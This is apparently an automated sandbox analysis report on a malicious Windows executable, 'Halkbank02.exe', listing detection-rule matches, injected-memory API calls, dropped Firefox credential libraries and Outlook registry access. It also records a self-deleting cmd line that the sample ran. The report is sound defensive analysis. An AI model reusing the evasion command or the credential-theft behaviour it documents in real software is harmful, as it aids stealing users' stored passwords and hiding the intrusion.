      Source: 28.2.Halkbank02.exe.1fcb3556.3.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
      Source: 28.2.Halkbank02.exe.1fcb7b4f.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
      Source: 28.2.Halkbank02.exe.1fcbc4bf.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
      Source: 00000001.00000002.559362429.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000001.00000000.235153506.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000000.557106702.0000000000410000.00000020.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00401500
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402872
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402C7A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402A0C
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402C3F
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004028F7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402A81
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004020A7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00401550
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402B02
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_004027DC
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_00402B84
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_0040298D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A0E15
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA2B9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A08DF
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A614D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A65A4
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A11E1
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A122A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A022B
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A2024
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4E25
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A060B
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA00E
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A146E
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A3673
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A0A46
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A1C46
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8452
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A2850
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A18AE
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4AA3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9AA0
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A38A1
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A46B6
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A248A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8E8E
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A628F
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A3093
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A7294
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A98EA
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A28EB
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8EE0
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A90F3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A22F6
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A52C8
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA8D9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A50D3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AACD7
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A352D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A6F22
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A630A
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9B0D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A2F1D
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8D6F
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A5963
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A1B72
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9149
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A1340
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9745
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8F56
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4983
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A6781
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A1592
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A85E3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4DF9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A41F0
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA7C9
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A99C2
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9DC3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A9DC1
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A05DF
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A69DD
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A37D2
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4DD3
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A89D6
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A0E15 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA2B9 NtWriteVirtualMemory,K32GetDeviceDriverBaseNameA,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A65A4 NtWriteVirtualMemory,NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A11E1 NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA1D8 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A2024 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AA254 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A52C8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A50D3 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022AACD7 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A352D NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A8D6F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A5963 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A6781 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A85E3 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4DF9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A41F0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeCode function: 1_2_022A4DD3 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess Stats: CPU usage > 98%
      Source: api-ms-win-core-util-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-private-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l2-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-heap-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-localization-l1-2-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-console-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-math-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-filesystem-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-multibyte-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-processthreads-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-time-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-debug-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-environment-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-locale-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-convert-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-rtlsupport-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-conio-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l1-2-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-libraryloader-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-file-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-processthreads-l1-1-1.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-errorhandling-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-profile-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-processenvironment-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-handle-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-utility-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-string-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-string-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-datetime-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-timezone-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-heap-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-stdio-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-memory-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-sysinfo-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-synch-l1-2-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-interlocked-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-namedpipe-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-core-synch-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-process-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: api-ms-win-crt-runtime-l1-1-0.dll.28.drStatic PE information: No import functions for PE file found
      Source: Halkbank02.exe, 00000001.00000000.235179747.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemeduse.exe vs Halkbank02.exe
      Source: Halkbank02.exe, 00000001.00000002.562536410.0000000002180000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemeduse.exeFE2XGeneral court% vs Halkbank02.exe
      Source: Halkbank02.exeBinary or memory string: OriginalFilename vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.872117132.000000001EFC4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000003.876940692.000000001F530000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs Halkbank02.exe
      Source: Halkbank02.exe, 0000001C.00000000.557120833.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemeduse.exe vs Halkbank02.exe
      Source: Halkbank02.exeBinary or memory string: OriginalFilenamemeduse.exe vs Halkbank02.exe
      Source: Halkbank02.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\Halkbank02.exeSection loaded: crtdll.dll
      Source: Halkbank02.exeReversingLabs: Detection: 13%
      Source: Halkbank02.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Halkbank02.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Halkbank02.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknownProcess created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Users\user\Desktop\Halkbank02.exe 'C:\Users\user\Desktop\Halkbank02.exe'
      Source: C:\Users\user\Desktop\Halkbank02.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'Halkbank02.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
      Source: C:\Users\user\Desktop\Halkbank02.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Users\user\Desktop\Halkbank02.exeFile created: C:\Users\user\AppData\Local\Temp\2fda\Jump to behavior
      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winEXE@8/53@2/3
      Source: C:\Users\user\Desktop\Halkbank02.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: SELECT ALL id FROM %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
      Source: C:\Users\user\Desktop\Halkbank02.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-F44B36F3-391C74315
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4016:120:WilError_01
      Source: C:\Users\user\Desktop\Halkbank02.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Halkbank02.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, nss3.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.28.dr
      Source: Binary string: ucrtbase.pdb source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, ucrtbase.dll.28.dr
      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-memory-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874674316.00000000200D4000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875491758.000000001F448000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876327978.000000001F490000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874899344.00000000200EC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875685309.000000001F450000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-synch-l1-1-0.dll.28.dr
      Source: Binary string: vcruntime140.i386.pdbGCTL source: Halkbank02.exe, 0000001C.00000003.881018739.000000001F820000.00000004.00000001.sdmp, vcruntime140.dll.28.dr
      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, mozglue.dll.28.dr
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.869027129.000000001F838000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Halkbank02.exe, api-ms-win-core-processthreads-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Halkbank02.exe, 0000001C.00000003.872382699.000000001EFC4000.00000004.00000001.sdmp, freebl3.dll.28.dr
      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000002.901129963.000000001F860000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.874818070.00000000200E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.876256297.000000001F478000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.28.dr
      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Halkbank02.exe, 0000001C.00000003.875879103.000000001F458000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.28.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Halkbank02.exe, 0000001C.00000003.878215194.000000001F598000.00000004.00000001.sdmp, softokn3.dll.28.dr
